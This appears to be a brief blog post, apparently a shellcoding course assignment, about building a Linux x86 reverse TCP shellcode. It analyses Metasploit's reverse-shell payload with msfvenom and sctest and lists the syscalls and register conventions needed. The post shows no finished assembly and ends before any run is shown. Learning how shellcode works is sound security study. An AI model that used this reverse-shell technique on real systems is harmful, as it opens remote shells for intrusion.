- Create a Shell_Reverse_TCP shellcode
- Reverse connect to configured IP and Port
- Execs Shell on successful connection
- IP and port should be easily configurable
First step is to view existing bind shell payload that is delivered with metasploit. With the use of msfvenom and sctest (as part of libemu) we can emulate the existing payload to analyze the steps taken
sudo msfvenom -p linux/x86/shell_reverse_tcp R | sudo ./sctest -vvv -Ss 10000 -G Shell_reverse.tcp.dot && dot Shell_reverse.tcp.dot -Tpng -o Shell_reverse.tcp.png
As we can see following syscalls are executed:
socket, dup2, connect and execve
/usr/include/i386-linux-gnu/asm/unistd_32.h for the syscalls
When searching for socket(), we discover the socketcall call , that has its own functions
#define __NR_socketcall 102
socket ; #define __NR_socketcall 102 int call 1
dub2 ; #define __NR_dup2 63
connect ; #define __NR_socketcall 102 int call 3
execve ; #define __NR_execve 11
Next step would be to translate this to assembly code.
For IA32, for a syscall to invoke the registeres need to be set the following way:
EAX = System call number
EBX = 1st argument
ECX = 2nd argument
EDX = 3rd argument
ESI = 4th argument
EDI = 5th argument
Note that we can borrow all but the connect() from our first assignment
Put this shellcode in shellcode running app, compile and run: ./compile.sh bindshell (via)
Run and connect:
No comments:
Post a Comment